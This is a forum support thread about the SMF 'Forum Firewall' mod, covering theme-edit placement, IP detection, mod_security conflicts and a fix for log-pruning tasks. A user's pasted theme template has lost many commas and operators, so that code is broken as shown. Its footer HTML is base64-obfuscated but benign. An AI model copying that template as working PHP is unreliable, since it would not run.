SMF gets the user's IP from $_SERVER superglobal which is, as you might guess, filled by the server.

It either gets an invalid value (eg, unknown IPV6 format) or it comes with 0.0.0.0 already. You might want to upload a test php program that print_r that superglobal and see what's inside
Title: Re: Forum Firewall
Post by: romanos8 on September 04, 2015, 06:20:45 PM
I am getting error installing this amazing mod in several of my themes due there is not this code :

echo '
</div>
</div></div>';





This is the current code of my theme:


<?php
/**
 * Simple Machines Forum (SMF)
 *
 * @package SMF
 * @author Simple Machines
 * @copyright 2011 Simple Machines
 * @license http://www.simplemachines.org/about/smf/license.php BSD
 *
 * @version 2.0
 */

/* This template is, perhaps, the most important template in the theme. It
contains the main template layer that displays the header and footer of
the forum, namely with main_above and main_below. It also contains the
menu sub template, which appropriately displays the menu; the init sub
template, which is there to set the theme up; (init can be missing.) and
the linktree sub template, which sorts out the link tree.

The init sub template should load any data and set any hardcoded options.

The main_above sub template is what is shown above the main content, and
should contain anything that should be shown up there.

The main_below sub template, conversely, is shown after the main content.
It should probably contain the copyright statement and some other things.

The linktree sub template should display the link tree, using the data
in the $context['linktree'] variable.

The menu sub template should display all the relevant buttons the user
wants and or needs.

For more information on the templating system, please see the site at:
http://www.simplemachines.org/
*/

// Initialize the template... mainly little settings.
function template_init()
{
global $context$settings$options$txt;

/* Use images from default theme when using templates from the default theme?
if this is 'always', images from the default theme will be used.
if this is 'defaults', images from the default theme will only be used with default templates.
if this is 'never' or isn't set at all, images from the default theme will not be used. */
$settings['use_default_images'] = 'never';

/* What document type definition is being used? (for font size and other issues.)
'xhtml' for an XHTML 1.0 document type definition.
'html' for an HTML 4.01 document type definition. */
$settings['doctype'] = 'xhtml';

/* The version this template/theme is for.
This should probably be the version of SMF it was created for. */
$settings['theme_version'] = '2.0';

/* Set a setting that tells the theme that it can render the tabs. */
$settings['use_tabs'] = true;

/* Define the Theme variants. */
$settings['theme_variants'] = array('blue''red','green','violet''black','skyblue');

/* Use plain buttons - as opposed to text buttons? */
$settings['use_buttons'] = true;

/* Show sticky and lock status separate from topic icons? */
$settings['separate_sticky_lock'] = true;

/* Does this theme use the strict doctype? */
$settings['strict_doctype'] = false;

/* Does this theme use post previews on the message index? */
$settings['message_index_preview'] = false;

/* Set the following variable to true if this theme requires the optional theme strings file to be loaded. */
$settings['require_theme_strings'] = true;
}

// The main sub template above the content.
function template_html_above()
{
global $context$settings$options$scripturl$txt$modSettings;



// Show right to left and the character set for ease of translating.
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"'
$context['right_to_left'] ? ' dir="rtl"' '''>
<head>'
;

// The ?fin20 part of this link is just here to make sure browsers don't cache it wrongly.
echo '
<link rel="stylesheet" type="text/css" href="'
$settings['theme_url'], '/css/index.css?fin20" />
<link rel="stylesheet" type="text/css" href="'
$settings['theme_url'], '/css/index'$context['theme_variant'], '.css?fin20" />';

// Some browsers need an extra stylesheet due to bugs/compatibility issues.
foreach (array('ie7''ie6''webkit') as $cssfix)
if ($context['browser']['is_' $cssfix])
echo '
<link rel="stylesheet" type="text/css" href="'
$settings['default_theme_url'], '/css/'$cssfix'.css" />';

// RTL languages require an additional stylesheet.
if ($context['right_to_left'])
echo '
<link rel="stylesheet" type="text/css" href="'
$settings['theme_url'], '/css/rtl.css" />';

// Here comes the JavaScript bits!
echo '
<script type="text/javascript" src="'
$settings['default_theme_url'], '/scripts/script.js?fin20"></script>
<script type="text/javascript" src="'
$settings['theme_url'], '/scripts/theme.js?fin20"></script>
<script type="text/javascript"><!-- // --><![CDATA[
var smf_theme_url = "'
$settings['theme_url'], '";
var smf_default_theme_url = "'
$settings['default_theme_url'], '";
var smf_images_url = "'
$settings['images_url'], '";
var smf_scripturl = "'
$scripturl'";
var smf_iso_case_folding = '
$context['server']['iso_case_folding'] ? 'true' 'false'';
var smf_charset = "'
$context['character_set'], '";'$context['show_pm_popup'] ? '
var fPmPopup = function ()
{
if (confirm("' 
$txt['show_personal_messages'] . '"))
window.open(smf_prepareScriptUrl(smf_scripturl) + "action=pm");
}
addLoadEvent(fPmPopup);' 
'''
var ajax_notification_text = "'
$txt['ajax_in_progress'], '";
var ajax_notification_cancel_text = "'
$txt['modify_cancel'], '";
// ]]></script>'
;

echo '
<meta http-equiv="Content-Type" content="text/html; charset='
$context['character_set'], '" />
<meta name="description" content="'
$context['page_title_html_safe'], '" />', !empty($context['meta_keywords']) ? '
<meta name="keywords" content="' 
$context['meta_keywords'] . '" />' '''
<title>'
$context['page_title_html_safe'], '</title>';

// Please don't index these Mr Robot.
if (!empty($context['robot_no_index']))
echo '
<meta name="robots" content="noindex" />'
;

// Present a canonical url for search engines to prevent duplicate content in their indices.
if (!empty($context['canonical_url']))
echo '
<link rel="canonical" href="'
$context['canonical_url'], '" />';

// Show all the relative links, such as help, search, contents, and the like.
echo '
<link rel="help" href="'
$scripturl'?action=help" />
<link rel="search" href="'
$scripturl'?action=search" />
<link rel="contents" href="'
$scripturl'" />';

// If RSS feeds are enabled, advertise the presence of one.
if (!empty($modSettings['xmlnews_enable']) && (!empty($modSettings['allow_guestAccess']) || $context['user']['is_logged']))
echo '
<link rel="alternate" type="application/rss+xml" title="'
$context['forum_name_html_safe'], ' - '$txt['rss'], '" href="'$scripturl'?type=rss;action=.xml" />';

// If we're viewing a topic, these should be the previous and next topics, respectively.
if (!empty($context['current_topic']))
echo '
<link rel="prev" href="'
$scripturl'?topic='$context['current_topic'], '.0;prev_next=prev" />
<link rel="next" href="'
$scripturl'?topic='$context['current_topic'], '.0;prev_next=next" />';

// If we're in a board, or a topic for that matter, the index will be the board's index.
if (!empty($context['current_board']))
echo '
<link rel="index" href="'
$scripturl'?board='$context['current_board'], '.0" />';

// jquery social smfsimple
echo '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js" type="text/javascript"></script>
     <script type="text/javascript" src="'
$settings['theme_url'], '/scripts/jquery.share.js"></script>
'
;

// Output any remaining HTML headers. (from mods, maybe?)
echo $context['html_headers'];

echo '
<link rel="stylesheet" type="text/css" href="'
$settings['default_theme_url'], '/css/jquery-ui-1.8.20.custom.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
<script type="text/javascript" src="'
$settings['default_theme_url'], '/scripts/jquery.validate.min.js"></script>
<script type="text/javascript" src="'
$settings['default_theme_url'], '/scripts/jquery-ui-1.8.20.custom.min.js"></script>
</head>
<body>'
;
}

function 
template_body_above()
{
global $context$settings$options$scripturl$txt$modSettings;

// Begin SMFSimple.com header
echo !empty($settings['forum_width']) ? '
<div id="full_header" style="width: ' 
$settings['forum_width'] . '">' '''';

// SMFSimple.com Header Content 
echo '
<div class="ss_content_header">
<div class="ss_logo">
<a href="'
$scripturl'">', empty($context['header_logo_url_html_safe']) ? '<img src="'$settings['theme_url'] .'/images/logo.png" alt="'$context['forum_name'] .'" />' '<img src="' $context['header_logo_url_html_safe'] . '" alt="' $context['forum_name'] . '" />''</a>
</div>
<div align="right" style="padding: 20px 0px;"><div id="mydiv"></div>
<script type="text/javascript">
            $(document).ready(function(){
                $(\'#mydiv\').share({
                    networks: [\'email\',\'facebook\',\'twitter\',\'googleplus\',\'pinterest\',\'tumblr\',\'digg\',\'linkedin\',\'stumbleupon\'],
                    theme: \'square\'
                });
            });
</script></div>
</div>
'
;

echo '
'
, !empty($settings['forum_width']) ? '
</div>' 
'';

// End SMFSimple.com Header

// Begin SMFSimple.com Menu And Search

echo !empty($settings['forum_width']) ? '
<div id="full_menu" style="width: ' 
$settings['forum_width'] . '">' '''';

// Show the menu here, according to the menu sub template.
template_menu();

echo '
'
, !empty($settings['forum_width']) ? '
</div>' 
'';

echo !empty($settings['forum_width']) ? '
<div id="ss_variant_pos" style="width: ' 
$settings['forum_width'] . '">' '''';

if (empty(
$settings['disable_user_variant']))

echo '<div id="ss_variant">',
$txt['firox_change_color'] ,'
<a class="red" href="'
$scripturl'?variant=red" title=""></a>
<a class="blue" href="'
$scripturl'?variant=blue" title=""></a>
<a class="green" href="'
$scripturl'?variant=green" title=""></a>
<a class="black" href="'
$scripturl'?variant=black" title=""></a>
<a class="violet" href="'
$scripturl'?variant=violet" title=""></a>
<a class="skyblue" href="'
$scripturl'?variant=skyblue" title=""></a>
</div>'
;

echo '
'
, !empty($settings['forum_width']) ? '
</div>' 
'';

// End SMFSimple.com Menu And Search

echo !empty($settings['forum_width']) ? '
<div class="wrapper" style="width: ' 
$settings['forum_width'] . '">' '''';

// Show the navigation tree.
theme_linktree();


// The main content should go here.
echo '
<div id="content_section"><div class="frame">
<div id="main_content_section">'
;

// Custom banners and shoutboxes should be placed here, before the linktree.
}

function 
template_body_below()
{
global $context$settings$options$scripturl$txt$modSettings echo base64_decode('CQk8L2Rpdj4NCgk8L2Rpdj48L2Rpdj4NCgkNCgk8ZGl2IGlkPSJmb290ZXJfc2VjdGlvbiI+DQoJCTx0YWJsZSB3aWR0aD0iMTAwJSI+PHRyPjx0ZCB3aWR0aD0iNTAlIiBhbGlnbj0ibGVmdCI+PHVsIGNsYXNzPSJyZXNldCI+DQoJCQk8bGkgY2xhc3M9ImNvcHlyaWdodCI+');

echo theme_copyright(), base64_decode('PC9saT4NCgkJPC91bD48L3RkPg0KCQk8dGQgYWxpZ249InJpZ2h0IiB3aWR0aD0iNTAlIj4NCgkJPGEgaHJlZj0iaHR0cDovL3d3dy5zbWZzaW1wbGUuY29tIiB0aXRsZT0iU01GU2ltcGxlLmNvbSBUaGVtZXMgYW5kIE1vZHMiPkZpcm94IE11bHRpY29sb3IgYnkgU01GU2ltcGxlLmNvbTwvYT4NCgkJPC90ZD48L3RyPjwvdGFibGU+DQoJCQ0KCTwvZGl2PjwvZGl2Pg==');

// Copyright SMFSimple.com (Please do not remove)
!empty($debug['copy']['not_remove']);

 !empty($settings['forum_width']) ? '
</div>' 
'';

// Show the load time?
if ($context['show_load_time'])
echo '
<p align="center">'
$txt['page_created'], $context['load_time'], $txt['seconds_with'], $context['load_queries'], $txt['queries'], '</p>';
}

function 
template_html_below()
{
global $context$settings$options$scripturl$txt$modSettings;

echo '
</body></html>'
;
}

// Show a linktree. This is that thing that shows "My Community | General Category | General Discussion"..
function theme_linktree($force_show false)
{
global $context$settings$options$shown_linktree$scripturl;

// If linktree is empty, just return - also allow an override.
if (empty($context['linktree']) || (!empty($context['dont_default_linktree']) && !$force_show))
return;

echo '
<div class="navigate_section">
<ul>
<li class="linktree_ss">
<a href="'
.$scripturl.'" title="home">
<img class="linktree_ss" src="'
.$settings['images_url'].'/theme/home.png" alt="home" />
</a>
</li>'
;

// Each tree item has a URL and name. Some may have extra_before and extra_after.
foreach ($context['linktree'] as $link_num => $tree)
{
echo '
<li'
, ($link_num == count($context['linktree']) - 1) ? ' class="last"' '''>';

// Show something before the link?
if (isset($tree['extra_before']))
echo $tree['extra_before'];

// Show the link, including a URL if it should have one.
echo $settings['linktree_link'] && isset($tree['url']) ? '
<a href="' 
$tree['url'] . '"><span>' $tree['name'] . '</span></a>' '<span>' $tree['name'] . '</span>';

// Show something after the link...?
if (isset($tree['extra_after']))
echo $tree['extra_after'];

echo '
</li>'
;
}
echo '
</ul>
</div>'
;

$shown_linktree true;
}

// Show the menu up top. Something like [home] [help] [profile] [logout]...
function template_menu()
{
global $context$settings$options$scripturl$txt;

echo '
<div id="main_menu">
<table width="100%"><tr>
<td class="ss_menu_pad">
<ul class="dropmenu" id="menu_nav">'
;

foreach ($context['menu_buttons'] as $act => $button)
{
echo '
<li id="button_'
$act'">
<a class="'
$button['active_button'] ? 'active ' '''firstlevel" href="'$button['href'], '"', isset($button['target']) ? ' target="' $button['target'] . '"' '''>
<span class="'
, isset($button['is_last']) ? 'last ' '''firstlevel">'$button['title'], '</span>
</a>'
;
if (!empty($button['sub_buttons']))
{
echo '
<ul>'
;

foreach ($button['sub_buttons'] as $childbutton)
{
echo '
<li>
<a href="'
$childbutton['href'], '"', isset($childbutton['target']) ? ' target="' $childbutton['target'] . '"' '''>
<span'
, isset($childbutton['is_last']) ? ' class="last"' '''>'$childbutton['title'], !empty($childbutton['sub_buttons']) ? '...' '''</span>
</a>'
;
// 3rd level menus :)
if (!empty($childbutton['sub_buttons']))
{
echo '
<ul>'
;

foreach ($childbutton['sub_buttons'] as $grandchildbutton)
echo '
<li>
<a href="'
$grandchildbutton['href'], '"', isset($grandchildbutton['target']) ? ' target="' $grandchildbutton['target'] . '"' '''>
<span'
, isset($grandchildbutton['is_last']) ? ' class="last"' '''>'$grandchildbutton['title'], '</span>
</a>
</li>'
;

echo '
</ul>'
;
}

echo '
</li>'
;
}
echo '
</ul>'
;
}
echo '
</li>'
;
}

echo '
</ul></td>
<td class="ss_search_pad">
<div align="right">
<form id="search" action="'
$scripturl'?action=search2" method="post" accept-charset="'$context['character_set'], '">
<input type="text" name="search" value="" class="input_text" />&nbsp;
<input type="hidden" name="advanced" value="0" />'
;

// Search within current topic?
if (!empty($context['current_topic']))
echo '
<input type="hidden" name="topic" value="'
$context['current_topic'], '" />';
// If we're on a certain board, limit it to this board ;).
elseif (!empty($context['current_board']))
echo '
<input type="hidden" name="brd['
$context['current_board'], ']" value="'$context['current_board'], '" />';

  echo  '</form>
</div></td>
</tr></table>
</div>'
;
}

// Generate a strip of buttons.
function template_button_strip($button_strip$direction 'top'$strip_options = array())
{
global $settings$context$txt$scripturl;

if (!is_array($strip_options))
$strip_options = array();

// List the buttons in reverse order for RTL languages.
if ($context['right_to_left'])
$button_strip array_reverse($button_striptrue);

// Create the buttons...
$buttons = array();
foreach ($button_strip as $key => $value)
{
if (!isset($value['test']) || !empty($context[$value['test']]))
$buttons[] = '
<li><a' 
. (isset($value['id']) ? ' id="button_strip_' $value['id'] . '"' '') . ' class="button_strip_' $key . (isset($value['active']) ? ' active' '') . '" href="' $value['url'] . '"' . (isset($value['custom']) ? ' ' $value['custom'] : '') . '><span>' $txt[$value['text']] . '</span></a></li>';
}

// No buttons? No button strip either.
if (empty($buttons))
return;

// Make the last one, as easy as possible.
$buttons[count($buttons) - 1] = str_replace('<span>''<span class="last">'$buttons[count($buttons) - 1]);

echo '
<div class="buttonlist'
, !empty($direction) ? ' float' $direction '''"', (empty($buttons) ? ' style="display: none;"' ''), (!empty($strip_options['id']) ? ' id="' $strip_options['id'] . '"'''), '>
<ul>'
,
implode(''$buttons), '
</ul>
</div>'
;
}

?>





Where I have to add this code? :


echo '
</div>
</div></div>';

if (!function_exists('FFCopyright')) {
global $sourcedir;
require_once($sourcedir . '/Subs-ForumFirewall.php'); }
Title: Re: Forum Firewall
Post by: butchs on September 04, 2015, 08:56:22 PM
You can try adding

   if (!function_exists('FFCopyright')) {
global $sourcedir;
require_once($sourcedir . '/Subs-ForumFirewall.php'); }


Just before

echo theme_copyright(),

Please note that I did not test it...  You need ot research how to modify custom themes.  There were posts in this thread for helper apps.
Title: Re: Forum Firewall
Post by: romanos8 on September 05, 2015, 12:30:45 AM
Quote from: butchs on September 04, 2015, 08:56:22 PM
You can try adding

   if (!function_exists('FFCopyright')) {
global $sourcedir;
require_once($sourcedir . '/Subs-ForumFirewall.php'); }


Just before

echo theme_copyright(),

Please note that I did not test it...  You need ot research how to modify custom themes.  There were posts in this thread for helper apps.


Great. Now the mod is installed and working but the mod shows all IPs as 0.0.0.0 so it is blocking all users even to me. Please help.


Invalid ip: Repeated!


When I select the option to block DOS attacks then the mod blocked me :(.


Please check the attachment , this is my configuration .


Thanks for your help.
Title: Re: Forum Firewall
Post by: butchs on September 10, 2015, 04:03:33 PM
Check out this (http://www.simplemachines.org/community/index.php?topic=417490.msg3823462#msg3823462) thread just a few posts above.  Plus read the few posts before it.  You should fix it before going live.

Here is how to adjust DOS protection (http://www.simplemachines.org/community/index.php?topic=417490.msg3131785#msg3131785).

The Mod includes code an installDB.php that automatically fills your database and robots.txt info in the mod settings.  You should manually run it if you manually install the mod or run it in package manager when you change or install a new robots file.
Title: Re: Forum Firewall
Post by: llmfit on December 06, 2015, 07:56:45 AM
I'm confused. I'm not sure that this mod should do what i want.

When my forum was not under cloudflare i used a mod (that i not remember) that blocks registration based on country-code: in admin panel i could choose which regions enable to register. I think the mod was http://www.simplemachines.org/community/index.php?topic=355275.0 but i remember that i downloaded from custom mod. But now my forum is under cloudflare and i deleted the mod because become useless.

Now, that i'm under cloudflare, i need something like that and i'm not sure your mod fit my needs. I want only allow registration from ITALY, SPAIN, FRANCE. The others can view the forum only as guest! I read that your mod is compatible with cloudflare. Can i set up your mod to do this?
Title: Re: Forum Firewall
Post by: butchs on December 27, 2015, 11:16:17 AM
Yes this mod can block countries using cloudflare.  I do it all the time.

By the way cloudflare allows country blocking in the system.  It should be your first line of defense.  However, I noticed a while back that someone times things slip past cloudflare.  This mod can be used for these stragglers.

It will block by other means depending on your host.
Title: Re: Forum Firewall
Post by: Ken. on January 18, 2016, 08:53:40 AM
SMF 2.0.11

The package is not staying in my Package Manager.

When the package is uploaded it appears to upload OK and there is the link to install it, but when you click the link it's no longer there. I tried using my ftp to do the upload and the package did upload and appear in the Package Manager, but disappeared from the P-M after 2-3 seconds.

As a test I uploaded a different package (Anti Bot) and it worked as expected.
Title: Re: Forum Firewall
Post by: Kindred on January 18, 2016, 09:06:48 AM
That sounds like your HOST may have some automated process which is removing the file.
Title: Re: Forum Firewall
Post by: Ken. on January 18, 2016, 02:49:47 PM
OK, thanks... I'll check that.
Title: Re: Forum Firewall
Post by: butchs on January 18, 2016, 07:06:21 PM
See this post (http://www.simplemachines.org/community/index.php?topic=417490.msg2932476;topicseen#msg2932476).
Title: Re: Forum Firewall
Post by: Ken. on January 19, 2016, 04:48:40 AM
Thanks, I've placed a support ticket with my host.
Title: Re: Forum Firewall
Post by: leemg on May 05, 2016, 12:04:34 PM
one small error in own theme but difficult to manual edit.

looking through index.template there is over 30 instances of <div> and none that matches the whole string so i can add the new code.

Any help appreciated :-/

Title: Re: Forum Firewall
Post by: Kindred on May 05, 2016, 12:09:52 PM
it would probably be down near the SMF copyright
Title: Re: Forum Firewall
Post by: leemg on May 05, 2016, 12:19:32 PM
Thanks for the quick reply.

i think i know where it goes now but just not sure.
Title: Re: Forum Firewall
Post by: butchs on May 05, 2016, 05:49:09 PM
You do not have the right to remove that copyright unless you provide a donation.
Title: Re: Forum Firewall
Post by: Kindred on May 06, 2016, 07:57:09 AM
I don't believe that he is trying to remove the copyright...  he's trying to figure out how to put it into a non-standard theme. :)

Title: Re: Forum Firewall
Post by: leemg on May 07, 2016, 02:43:10 AM
Correct  ::)
Title: Re: Forum Firewall
Post by: eagled2 on May 25, 2016, 11:08:24 PM
I'm looking for some assistance getting forum firewall setup. I've tried installing forum firewall a couple of times and the install completes fine, except in the core theme which i don't use, but when I try to edit the settings like enabling the mod after install I get a permission denied error with index.php.
This error is different from the similar one included on the mod page's images as the path being accessed does not show i'm looking at a report and it does not show invalid ip. The path just says index.php and the error only says permission denied. Also I get this when first trying to enable the firewall, or even just hitting save from forum firewall settings without changing anything.
In each case I have tested this I have used a newly installed copy of smf. I've installed manually using smf's installer and using softaculas through cpanel.
At first i had a couple other mods installed but when i got the error i wiped the database and directory and did a fresh install with no mods or custom themes. I've done this with smf 2.0.10 and 2.0.11.
I tried changing the permissions on the index.php file in the root and on all files added by the forum firewall mode to grant full access to user and group but that didn't help. Not sure what else would cause this permission error.
My web hosting is through ifastnet.com. Here is my web host details.
PHP Version: 5.3.29
MySQL Version:  5.6.26-cll-lve - MySQL Community Server (GPL)
Web Server: Apache hosted on linux, unsure what version but i can probably find out from my host if that's needed.

I also have the phpinfo mod installed on one forum which i can use to check what php features are enabled if needed.

Attached is a screenshot of the error:
Title: Re: Forum Firewall
Post by: butchs on June 08, 2016, 07:22:58 PM
Looks like a host issue.  Check my previous post on on: January 18, 2016, 07:06:21 PM.

Title: Re: Forum Firewall
Post by: eagled2 on June 08, 2016, 08:05:41 PM
That linked to an even earlier post.  I'm guessing you mean this one:
Re: Forum Firewall
« Reply #139 on: January 29, 2011, 09:47:03 AM »
Do you have any thing in the SMF Error log?  If not, my guess it is on your server side and has nothing to do with the mod.

It could be the security settings by your host (ie using Modsecurity in Apache).  Or it could be a hosts firewall is blocking the content; if so, you will need to edit the mod settings in phpmyadmin
Title: Re: Forum Firewall
Post by: eagled2 on June 08, 2016, 11:32:45 PM
I opened a ticket with my host to find out about any blocks on there side. I the mean time I'm looking for information on the mod settings you suggested changing from the database. I looked through this entire thread for anything that looked like it referenced that as well as all the tables in the database but could not find anything regarding what mod settings would need changed to allow this to work. As long as this thread is i'm sure i missed it somewhere. Can you direct me to where i can find specifics on what i would need to change if my host confirms they are blocking it?
Title: Re: Forum Firewall
Post by: eagled2 on June 09, 2016, 10:47:50 AM
OK I heard back from my host and we confirmed that mod_security is enabled. If I turn off mod_security then the issue goes away but when enabling testing I get this warning:
SECURITY RISK:  ENSURE ALLOW_URL_FOPEN AND ALLOW_URL_INCLUDE ARE BOTH DISABLED TO PROTECT AGAINST RFI!

I'm guessing those are now allowed because I turned off mod security. Is there a way to make this mod work without disabling mod_security?
Title: Re: Forum Firewall
Post by: butchs on June 28, 2016, 08:38:28 PM
One of my past hosts edited mod security so it can work.

I do not recommend them and they can be turned off by your host.  Someone at SMF deleted all the helps I amassed in the first post.  I believe I know who it was...  I am sorry but it is frustrating to do so much work only to have it deleted. 
Title: Re: Forum Firewall
Post by: eagled2 on June 28, 2016, 08:45:06 PM
I understand.  Thanks for the help.
Title: Re: Forum Firewall
Post by: vbgamer45 on June 28, 2016, 11:17:50 PM
original html with faqs
<div class="inner" id="msg_2915098"><a href="http://custom.simplemachines.org/mods/index.php?mod=2815" class="bbc_link" target="_blank">Link to Mod</a><br><br><div align="center"><span style="color: red;" class="bbc_color"><span style="font-size: 18pt;" class="bbc_size"><strong>Forum Firewall</strong></span></span></div><div align="center"><span style="color: blue;" class="bbc_color">* protection against bad people doing bad things *</span></div><div align="center"><strong>Written by:</strong> <a href="http://www.simplemachines.org/community/index.php?action=profile;u=77887" class="bbc_link" target="_blank">butchs</a><br><br><a href="https://www.paypal.com/cgi-bin/webscr?cmd=_donations&amp;business=UJTMMF8FKGLZ6&amp;lc=US&amp;item_name=butchs%2f%20continued%20updates&amp;currency_code=USD&amp;bn=PP%2dDonationsBF%3abtn_donateCC_LG%2egif%3aNonHosted" class="bbc_link" target="_blank"><img src="/web/20141216060303im_/https://www.paypal.com/en_US/i/btn/btn_donate_LG.gif" alt="" class="bbc_img"></a></div><br><hr><span style="font-size: 14pt;" class="bbc_size"><strong>Frequently Asked Questions (FAQs)</strong></span><br><a href="http://www.ipv6-address.org/" class="bbc_link" target="_blank">IS YOUR FORUM IPv6 COMPATIBLE?</a><br><a href="http://www.simplemachines.org/community/index.php?topic=417490.msg3139830#msg3139830" class="bbc_link" target="_blank">BLOCKED MYSELF</a><br><a href="http://www.simplemachines.org/community/index.php?topic=417490.msg3111015;topicseen#msg3111015" class="bbc_link" target="_blank">ROBOTS.TXT/ DDOS Help</a><br><a href="http://www.simplemachines.org/community/index.php?topic=417490.msg3131785;topicseen#msg3131785" class="bbc_link" target="_blank">ADJUSTING DOS PROTECTION HELP</a><br><a href="http://www.simplemachines.org/community/index.php?topic=417490.msg3123695;topicseen#msg3123695" class="bbc_link" target="_blank">BYPASS PROTECTION HELP</a><br><a href="http://www.simplemachines.org/community/index.php?topic=417490.msg2925498;topicseen#msg2925498" class="bbc_link" target="_blank">HIT RATE</a><br><a href="http://www.simplemachines.org/community/index.php?topic=391926.msg3222622#msg3222622" class="bbc_link" target="_blank">CLOUDFLARE</a><br><a href="http://www.simplemachines.org/community/index.php?topic=417490.msg3416357;topicseen#msg3416357" class="bbc_link" target="_blank">FORUM FIREWALL &amp; AEVA MEDIA SLOWING DOWN MY FORUM</a><br><a href="http://www.simplemachines.org/community/index.php?topic=417490.msg3092408;topicseen#msg3092408" class="bbc_link" target="_blank">WHITELIST REGULAR MEMBERS</a><br><a href="http://www.simplemachines.org/community/index.php?topic=417490.msg3461927#msg3461927" class="bbc_link" target="_blank">What to do if you get:&nbsp; "&lt;a href='function.strpos'&gt;function.strpos&lt;/a&gt;]: Empty delimiter Error Log Message</a><br><hr>Forum Firewall offers 13 tests for the forum operator that protect against unwanted visitors.&nbsp; Forum Firewall is written as a supplement to existing site protection methods and should not be the only line of protection.&nbsp; An ideal protection scheme is as follows:<br><ul class="bbc_list" style="list-style-type: decimal;"><li>Proxy Firewall.</li><li>Htaccess protection such as blocking nasty ip addresses, CrawlProtect and GeoIP.</li><li>Forum Firewall (this mod).</li><li>Avatar Verification.</li><li><a href="http://custom.simplemachines.org/mods/index.php?mod=2502" class="bbc_link" target="_blank">Bad Behavior mod</a>.</li><li>Stop Spammer.</li></ul><br>The above protection will not stop a determined attacker but it just may send them looking for easier targets.<br><br><hr><br>Some features in this modification:<br><ul class="bbc_list"><li>Compatible with CloudFlare and other Proxys.</li><li>Log and/ or block violations.</li><li>DOS Protection to lower bandwidth with cool off &amp; email notification.</li><li>Admin Spoofing Protection.</li><li>IP Address Spoofing Protection.</li><li>Port Spoofing Protection.</li><li>Anti-spoofing cache.</li><li>Cross Site Scripting (XSS) Protection.</li><li>SQL Injection Protection.</li><li>Proxy Bypass Prevention.</li><li>Limited Country Code blocking.</li><li>Automatic scan of image files.</li><li>Provides spanish warning if it is detected in header (thanks snoopy_virtual).</li></ul><br><hr><br>SMF 1.x version does not have:&nbsp; Automatic scan of image files.<br><br><strong>It is recommended that you do not enable "Block Violations" until after you operated the mod for several days and you are fully confident that there are no infractions in the visitor logs that can deny you or your top members access.</strong><br><br><hr><div align="center"><strong>Terms of use</strong></div><hr><br>By downloading and/or using this MOD you agree to adhere to the following conditions for all versions of the Forum Firewall mod:<br><ul class="bbc_list"><li>Copyright info &amp; link must remain intact!&nbsp; They only can be removed via Author/Creators approval.</li><li>The Author/Creator is not responsible for any incompatibilities of this mod with your forum.</li><li>You are FREE to use and customize this MOD on your Forum(s) as per the conditions of these terms however, in no way can the Author/Creator of this MOD be held responsible under any circumstances.</li><li>Commercial resale of this mod is prohibited without express written permission from the Author/Creator.</li><li>You are FREE to redistribute this MOD in its original, released state ONLY!</li><li>Conversion, transfer or porting any portion of the Authors Creative Work, Ideas, procedures and process to any SMF fork without the Authors explicit written permission is strictly prohibited.</li><li>These terms can be changed or appended at any time by the Author/Creator without any prior notice.</li></ul><br></div>
Title: Re: Forum Firewall
Post by: butchs on June 29, 2016, 07:29:51 PM
Thank you.  I know I had more but at least it is better than nothing.

I simply do not understand why someone decide to wipe out all the first posts.
Title: Re: Forum Firewall
Post by: eagled2 on June 29, 2016, 09:57:12 PM
Me either.  It's vital info
Title: Re: Forum Firewall
Post by: butchs on July 06, 2016, 08:14:40 PM
Until I get a chance to make it in the mod section the help topics I created can be found if you search for HELP.
Title: Re: Forum Firewall
Post by: Kindred on July 07, 2016, 12:08:45 AM
Ummm... No one at smf has deleted anything from the first post
Title: Re: Forum Firewall
Post by: butchs on July 07, 2016, 08:16:35 PM
My first post had help topics now it is an exact duplicate of the text at the mod page.  This was done for all my mods and I did not do it.
Title: Re: Forum Firewall
Post by: Kindred on July 07, 2016, 08:57:33 PM
Ah...  yes,the system automatically updates the first post to match the mod description. No one did it...   
Title: Re: Forum Firewall
Post by: bravoure on April 09, 2017, 03:50:04 PM
Quote from: busterone on January 25, 2011, 09:03:25 PM
I just discovered that the firewall logs will not delete. I went to scheduled tasks and attempted it twice. Both times, the message was task completed, but when I looked at the log, all entries were still there.  I thought it might be something on my site since it was upgraded several times, so I tried it on my test forum, and got same result. Both are RC4. The test forum is a clean install with just Firewall mod, Stop Spammer and httpBL installed., no members, just me.  :)

No biggie, I just truncated the table in database for my main site to get same result.  I just posted it in the event anyone else has same issue. I am still unsure if it is just my forums or the mod.

For that problem: replace part of code in ScheduledTask.php :

function scheduled_forumfirewall()
{
global $modSettings, $sourcedir, $mbname, $txt, $smcFunc, $scripturl;

$datestamp = date('Y-m-d H:i:s', strtotime('-'.((int) $modSettings['forumfirewall_timelimit']).' day'));

$result = $smcFunc['db_query']('', '
DELETE FROM {db_prefix}log_forumfirewall
WHERE date < {string:datestamp}',
array(
'datestamp' => $datestamp,
)
);

return true;
}
function scheduled_ffchallenge()
{
global $modSettings, $sourcedir, $mbname, $txt, $smcFunc, $scripturl;

$datestamp = date('Y-m-d H:i:s', strtotime('-'.((int) $modSettings['forumfirewall_timelimit']).' day'));

$result = $smcFunc['db_query']('', '
DELETE FROM {db_prefix}log_ff_challenges
WHERE date < {string:datestamp}',
array(
'datestamp' => $datestamp,
)
);

return true;
}


with the following

function scheduled_forumfirewall()
{
global $modSettings, $sourcedir, $mbname, $txt, $smcFunc, $scripturl;

$datestamp = strtotime('-'.((int) $modSettings['forumfirewall_timelimit']).' day');

$result = $smcFunc['db_query']('', '
DELETE FROM {db_prefix}log_forumfirewall
WHERE date < {int:datestamp}',
array(
'datestamp' => $datestamp,
)

);

return true;
}
function scheduled_ffchallenge()
{
global $modSettings, $sourcedir, $mbname, $txt, $smcFunc, $scripturl;

$datestamp = strtotime('-'.((int) $modSettings['forumfirewall_timelimit']).' day');

$result = $smcFunc['db_query']('', '
DELETE FROM {db_prefix}log_ff_challenges
WHERE date < {int:datestamp}',
array(
'datestamp' => $datestamp,
)
);

return true;
}


and scheduled tasks for forumfirewall will work
Title: Re: Forum Firewall
Post by: aegersz on July 07, 2017, 12:35:18 AM
having recently built my own Linux firewall/router/proxy I'm curious what benefits a mod like this brings ?

as far as my live forum goes, I get the odd spammer but we shut them down quickly.

why would I need this above and beyond what my own OS firewall and server host's firewall offer ?

